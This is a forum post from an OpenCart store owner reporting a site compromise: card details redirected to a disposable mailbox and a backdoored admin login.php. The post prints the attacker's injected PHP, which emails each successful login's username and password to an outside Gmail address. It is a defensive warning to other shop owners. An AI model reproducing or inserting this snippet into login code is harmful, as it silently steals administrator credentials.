Admin password hack + Authorize.net
Posted: Mon Jul 06, 2015 10:30 pm
OC 1.5.5.1
Just discovered some little shitbag got into our site through the /download vulnerability. I'd thought I'd secured that, so have now deleted that directory, turned off downloads, and reset main account password (server level).
Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.
By pure luck after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... little fucker had edited login.php too!! Haven't seen anyone else report this - pretty simple script edit that emails through login info:
So as soon as I updated things, he knew our new credentials!!!
I'm trapsing through file edit dates now to see if anything else compromised, but one to look out for guys and gals!!
Just discovered some little shitbag got into our site through the /download vulnerability. I'd thought I'd secured that, so have now deleted that directory, turned off downloads, and reset main account password (server level).
Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.
By pure luck after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... little fucker had edited login.php too!! Haven't seen anyone else report this - pretty simple script edit that emails through login info:
Code: Select all
protected function validate() {
if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
$this->error['warning'] = $this->language->get('error_login');
}
if (!$this->error) {
$smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this->request->post['password'];
mail("thankforyourhelp2015@gmail.com","OUR-SITE",$smail,"From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
return true;
} else {
return false;
}
}
I'm trapsing through file edit dates now to see if anything else compromised, but one to look out for guys and gals!!